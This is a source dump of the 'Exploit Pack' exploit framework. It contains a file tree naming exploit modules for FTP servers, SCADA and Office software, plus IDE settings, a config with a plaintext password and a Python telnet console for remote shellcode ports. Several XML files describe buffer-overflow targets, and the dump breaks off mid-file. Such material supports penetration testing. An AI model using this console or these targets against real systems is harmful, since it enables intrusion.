└── Exploit Pack
├── .classpath
├── .project
├── .settings
├── .jsdtscope
├── org.eclipse.jdt.core.prefs
├── org.eclipse.mylyn.tasks.ui.prefs
├── org.eclipse.wst.jsdt.ui.superType.container
└── org.eclipse.wst.jsdt.ui.superType.name
├── bin
├── .gitignore
├── CheckUpdate$1.class
├── CheckUpdate.class
├── org
│ └── eclipse
│ │ └── wb
│ │ └── swt
│ │ └── SWTResourceManager.class
└── resources
│ ├── 1316133571_package_go.png
│ ├── 1316133906_package.png
│ ├── 1316134049_table_save.png
│ ├── 1316134303_application_form_delete.png
│ ├── 1316134425_cut_red.png
│ ├── 1316134439_page_copy.png
│ ├── 1316134460_page_white_paste.png
│ ├── 1316134599_chart_bar.png
│ ├── 1330156330_key.png
│ ├── 1330157278_key.png
│ ├── Folder_o.gif
│ ├── Thumbs.db
│ ├── about.png
│ ├── about2.png
│ ├── application.png
│ ├── arrow_redo.png
│ ├── arrow_undo.png
│ ├── binary.gif
│ ├── binary.png
│ ├── bug.png
│ ├── checkupdate.png
│ ├── close.gif
│ ├── cog.png
│ ├── computer.png
│ ├── download.png
│ ├── editor.png
│ ├── find.png
│ ├── folder.png
│ ├── folderpath.png
│ ├── help.png
│ ├── history.png
│ ├── logo2.png
│ ├── modulesearch.png
│ ├── port.png
│ ├── preferences.png
│ ├── refresh.png
│ ├── reportbug.png
│ ├── run.png
│ ├── search.gif
│ ├── splash.png
│ ├── splash2.png
│ ├── splashep.png
│ ├── square_redS.gif
│ ├── square_yellowS.gif
│ ├── stop.png
│ ├── terminal.png
│ ├── up.png
│ ├── updatebrowser.png
│ ├── updatemanager.png
│ ├── updater.png
│ ├── webdown.gif
│ ├── webup.gif
│ ├── www.png
│ └── xpFolder.gif
├── data
├── agent
│ └── agentconnect.py
├── config
│ ├── exploitpack.config
│ └── exploitpack1
├── newagent.wav
└── package.png
├── exploits
├── AB-Unreal-Server.xml
├── ActFax-FTP-Server.xml
├── Adobe-Flash-Mp4.xml
├── Apache-Mod-JK.xml
├── AudioTran-PLS.xml
├── Avaya-winpdm.xml
├── Aviosoft-Digital.xml
├── Avira-Guard.xml
├── BIG-Ant-Server-XPLT.xml
├── BIG-Ant-Server.xml
├── Bison-FTP-Server-MKD.xml
├── Bison-FTP-Server.xml
├── Bopup-Com-Server.xml
├── CA-ArcServe.xml
├── Cerberus-FTP-Server.xml
├── CoDeSyS-SCADA-Server.xml
├── Cogent-Datahub.xml
├── Core-FTP-Server.xml
├── Denial-Of-Service.xml
├── Disk-Pulse-Server.xml
├── EChat-Server-v2.5.xml
├── Easy-FTP-Server-1.7.11.xml
├── Example.xml
├── FTP-Getter.xml
├── Free-Float-FTP-ACCL.xml
├── Free-Float-FTP-REST.xml
├── Free-Float-FTP-Server.xml
├── GOM-Player.xml
├── IBM-Tivoli-Storage.xml
├── KingView-Scada.xml
├── KnFTP-Server.xml
├── Kolibri-Server.xml
├── LDAP-Server.xml
├── LDAP-Vault.xml
├── Microsoft-Excel-Record.xml
├── Microsoft-Visio.xml
├── Microsoft-Word-Record.xml
├── Quick-Player.xml
├── Remote-Scanner.xml
├── SAP-Server-MaxDB.xml
├── SDP-Downloader.xml
├── Savant-Web-Server.xml
├── Script-FTP-3.3.xml
├── Simple-HTTPD.xml
├── Solar-FTP-Server.xml
├── Sysax-multi.xml
├── TFTP-Server-1.4ST.xml
├── UPlus-FTP-Server.xml
├── Verm-FTP-Daemon.xml
├── Windows-Movie-Maker.xml
├── XM-Personal-FTP-Server.xml
├── XlightFTP-Server-v3.7.0.xml
├── YourPersonalWebServer.xml
├── code
│ ├── ABunreal.py
│ ├── BigAnt_Server_version_2.50_XPLT.py
│ ├── Cogent-datahub.py
│ ├── CoreFTP.py
│ ├── DenialOfService80.py
│ ├── EChat-Server-v2.5.py
│ ├── EasyFTPServer1.7.11.py
│ ├── Example.py
│ ├── ExploitActFax.py
│ ├── ExploitAudiotran.py
│ ├── ExploitBIGAntServer.py
│ ├── ExploitMSExcel.py
│ ├── ExploitMSWord.py
│ ├── ExploitQuickPlayer.py
│ ├── FreeFloatFTPServer.py
│ ├── KnFTPServer.py
│ ├── SavantWebServer.py
│ ├── TFTP_Server1.4ST.py
│ ├── Vermillion_FTP_Deamon_v1.31_Remote_BOF_Exploit.py
│ ├── WMMaker.py
│ ├── XMEasyPersonalFtp.py
│ ├── XlightServer3.7.0.py
│ ├── YourOpenPersonalWEBSERVER_DCA-00015.py
│ ├── adobeflashmp4.py
│ ├── avayawinpdm.py
│ ├── avguard.py
│ ├── aviosoftdigital.py
│ ├── bftp_bof.py
│ ├── bisonftpserver.py
│ ├── bopup.py
│ ├── ca_bof_poc.py
│ ├── cerberusftpserver-overflow.py
│ ├── codeweb.py
│ ├── data
│ │ └── src.MSWMM
│ ├── diskpulseserver-overflow.py
│ ├── dsmcad.py
│ ├── exploit.html
│ ├── freefloatftpACCL.py
│ ├── freefloatftpREST.py
│ ├── ftpgetter.py
│ ├── gomplayer.py
│ ├── kingview.py
│ ├── kolibry.py
│ ├── ldap_server_0day.py
│ ├── microsoft-visio.py
│ ├── output
│ │ ├── document test.doc
│ │ ├── exploit.m3u
│ │ └── spreadsheet test.xls
│ ├── sapmaxdb-exec.py
│ ├── scriptftp33.py
│ ├── sdpDownloader.py
│ ├── sidvault_ldap.py
│ ├── simplehttpd142.py
│ ├── solarftpPASVexploit.py
│ ├── sysaxmulti.py
│ └── uplusftp-overflow.py
└── index
│ ├── data.list
│ ├── module.list
│ └── xml.list
├── log
├── Sessions.log
└── exploitpack.log
├── src
├── CheckUpdate.java
├── com
│ └── exploitpack
│ │ ├── agent
│ │ ├── CheckConnection.java
│ │ ├── CheckOS.java
│ │ ├── Connect.java
│ │ └── Disconnect.java
│ │ ├── editor
│ │ ├── JunkDialog.java
│ │ ├── MainEditor.java
│ │ ├── SWTTextEditor.java
│ │ ├── TabsTest.java
│ │ └── TextEditor.java
│ │ ├── main
│ │ ├── About.java
│ │ ├── BalloonWindow.java
│ │ ├── Base64.java
│ │ ├── CheckUpdate.java
│ │ ├── CheckWebsite.java
│ │ ├── License.java
│ │ ├── MainWindow.java
│ │ ├── OSValidator.java
│ │ ├── Preferences.java
│ │ ├── Register.java
│ │ ├── Reports.java
│ │ ├── RequirementInstaller.java
│ │ ├── SplashScreen.java
│ │ ├── SysTray.java
│ │ ├── Updater.java
│ │ └── XMLTreenode.java
│ │ ├── project
│ │ ├── ProjectWindow.java
│ │ └── ProjectWindow2.java
│ │ └── scanner
│ │ └── ShowDialog.java
├── org
│ └── eclipse
│ │ └── wb
│ │ └── swt
│ │ └── SWTResourceManager.java
└── resources
│ ├── 1316133571_package_go.png
│ ├── 1316133906_package.png
│ ├── 1316134049_table_save.png
│ ├── 1316134303_application_form_delete.png
│ ├── 1316134425_cut_red.png
│ ├── 1316134439_page_copy.png
│ ├── 1316134460_page_white_paste.png
│ ├── 1316134599_chart_bar.png
│ ├── 1330156330_key.png
│ ├── 1330157278_key.png
│ ├── Folder_o.gif
│ ├── Thumbs.db
│ ├── about.png
│ ├── about2.png
│ ├── application.png
│ ├── arrow_redo.png
│ ├── arrow_undo.png
│ ├── binary.gif
│ ├── binary.png
│ ├── bug.png
│ ├── checkupdate.png
│ ├── close.gif
│ ├── cog.png
│ ├── computer.png
│ ├── download.png
│ ├── editor.png
│ ├── find.png
│ ├── folder.png
│ ├── folderpath.png
│ ├── help.png
│ ├── history.png
│ ├── logo2.png
│ ├── modulesearch.png
│ ├── port.png
│ ├── preferences.png
│ ├── refresh.png
│ ├── reportbug.png
│ ├── run.png
│ ├── search.gif
│ ├── splash.png
│ ├── splash2.png
│ ├── splashep.png
│ ├── square_redS.gif
│ ├── square_yellowS.gif
│ ├── stop.png
│ ├── terminal.png
│ ├── up.png
│ ├── updatebrowser.png
│ ├── updatemanager.png
│ ├── updater.png
│ ├── webdown.gif
│ ├── webup.gif
│ ├── www.png
│ └── xpFolder.gif
├── swing2swt.jar
└── test.html
/Exploit Pack/.classpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | Exploit Pack
4 |
5 |
6 |
7 |
8 |
9 | org.eclipse.wst.jsdt.core.javascriptValidator
10 |
11 |
12 |
13 |
14 | org.eclipse.jdt.core.javabuilder
15 |
16 |
17 |
18 |
19 |
20 | org.eclipse.jdt.core.javanature
21 | org.eclipse.wst.jsdt.core.jsNature
22 |
23 |
24 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/.jsdtscope:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.jdt.core.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
5 | org.eclipse.jdt.core.compiler.compliance=1.6
6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate
7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate
8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate
9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
11 | org.eclipse.jdt.core.compiler.source=1.6
12 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.mylyn.tasks.ui.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | project.repository.kind=githubGists
3 | project.repository.url=https\://gist.github.com
4 |
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.wst.jsdt.ui.superType.container:
--------------------------------------------------------------------------------
1 | org.eclipse.wst.jsdt.launching.baseBrowserLibrary
--------------------------------------------------------------------------------
/Exploit Pack/.settings/org.eclipse.wst.jsdt.ui.superType.name:
--------------------------------------------------------------------------------
1 | Window
--------------------------------------------------------------------------------
/Exploit Pack/bin/.gitignore:
--------------------------------------------------------------------------------
1 | /com
2 |
--------------------------------------------------------------------------------
/Exploit Pack/bin/CheckUpdate$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/CheckUpdate$1.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/CheckUpdate.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/CheckUpdate.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/org/eclipse/wb/swt/SWTResourceManager.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/org/eclipse/wb/swt/SWTResourceManager.class
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316133571_package_go.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316133571_package_go.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316133906_package.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316133906_package.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134049_table_save.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134049_table_save.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134303_application_form_delete.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134303_application_form_delete.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134425_cut_red.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134425_cut_red.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134439_page_copy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134439_page_copy.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134460_page_white_paste.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134460_page_white_paste.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1316134599_chart_bar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1316134599_chart_bar.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1330156330_key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1330156330_key.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/1330157278_key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/1330157278_key.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/Folder_o.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/Folder_o.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/Thumbs.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/Thumbs.db
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/about.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/about.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/about2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/about2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/application.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/application.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/arrow_redo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/arrow_redo.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/arrow_undo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/arrow_undo.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/binary.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/binary.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/binary.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/binary.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/bug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/bug.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/checkupdate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/checkupdate.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/close.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/close.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/cog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/cog.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/computer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/computer.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/download.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/download.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/editor.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/editor.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/find.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/find.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/folder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/folder.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/folderpath.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/folderpath.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/help.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/history.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/history.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/logo2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/logo2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/modulesearch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/modulesearch.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/port.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/preferences.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/preferences.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/refresh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/refresh.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/reportbug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/reportbug.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/run.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/run.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/search.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/search.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splash.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splash2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splash2.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/splashep.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/splashep.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/square_redS.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/square_redS.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/square_yellowS.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/square_yellowS.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/stop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/stop.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/terminal.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/up.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updatebrowser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updatebrowser.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updatemanager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updatemanager.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/updater.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/updater.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/webdown.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/webdown.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/webup.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/webup.gif
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/www.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/www.png
--------------------------------------------------------------------------------
/Exploit Pack/bin/resources/xpFolder.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/bin/resources/xpFolder.gif
--------------------------------------------------------------------------------
/Exploit Pack/data/agent/agentconnect.py:
--------------------------------------------------------------------------------
1 | #Exploit Pack - Security Framework for Exploit Developers
2 | #Copyright 2011 Juan Sacco http://exploitpack.com
3 | #
4 | #This program is free software: you can redistribute it and/or modify it under the terms of the
5 | #GNU General Public License as published by the Free Software Foundation, either version 3
6 | #or any later version.
7 | #
8 | #This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
9 | #without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
10 | #PURPOSE. See the GNU General Public License for more details.
11 | #
12 | #You should have received a copy of the GNU General Public License along with this program.
13 | #If not, see http://www.gnu.org/licenses/
14 |
15 | import sys
16 | import telnetlib
17 |
18 | Host = sys.argv[1]
19 | ShellCodePort = sys.argv[2]
20 |
21 | print "Exploit Pack - Remote Shellcode Console\r\n"
22 | print "Connecting to " + Host
23 | print "Please wait...\r\n"
24 | print "CTRL+C to exit\r\n"
25 |
26 | try:
27 | TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
28 | TelnetConnection.interact()
29 | except:
30 | print "Sorry, connection error"
--------------------------------------------------------------------------------
/Exploit Pack/data/config/exploitpack.config:
--------------------------------------------------------------------------------
1 | /usr/bin/python2.7
2 |
3 | Configured automatically
4 | Configured automatically
5 | BetaUser
6 | asd123
7 |
--------------------------------------------------------------------------------
/Exploit Pack/data/config/exploitpack1:
--------------------------------------------------------------------------------
1 | 1
--------------------------------------------------------------------------------
/Exploit Pack/data/newagent.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/data/newagent.wav
--------------------------------------------------------------------------------
/Exploit Pack/data/package.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chiehwen/exploitpack/7ec46d22e9119050f9f06b101b5b853bbb0ec78a/Exploit Pack/data/package.png
--------------------------------------------------------------------------------
/Exploit Pack/exploits/AB-Unreal-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | AB Unreal Server is prone to a remote buffer overflow because it fails to perform adequate boundary-checks on user-supplied data.
9 | Successfully exploiting will allow an attacker to execute arbitrary code within the context of the affected application.
10 | Failed exploit attempts will result in a denial-of-service condition.
11 |
12 |
13 |
14 | Microsoft Windows XP SP3 - SP2 - SP1
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/ActFax-FTP-Server.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
6 |
7 |
8 |
9 | This module exploits a stack-based buffer overflow in actfax ftp Server version 4.27 and earlier. Actfax fails to check input size when parsing 'USER' command.
10 | ToDo: Add Execute Shell
11 | ToDo: Test Targets
12 |
13 |
14 |
15 | Microsoft Windows XP SP2, Microsoft Windows XP SP3
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Adobe-Flash-Mp4.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1
9 | allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors,
10 | a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.
11 |
12 |
13 |
14 | Windows XP SP2, SP3, MacOSX, Vista, 7
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Apache-Mod-JK.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache
9 | Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute
10 | arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
11 |
12 |
13 |
14 | Apache/2.0.58 (Win32) mod_jk/1.2.19 - Apache/2.0.59 (Win32) mod_jk/1.2.19
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/AudioTran-PLS.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow Stack Overflow / SEH
9 | ToDo: Add Lib Shell
10 | ToDo: Test Vulnerable Targets
11 |
12 |
13 |
14 | Windows XP SP2 , SP3
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/Exploit Pack/exploits/Avaya-winpdm.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
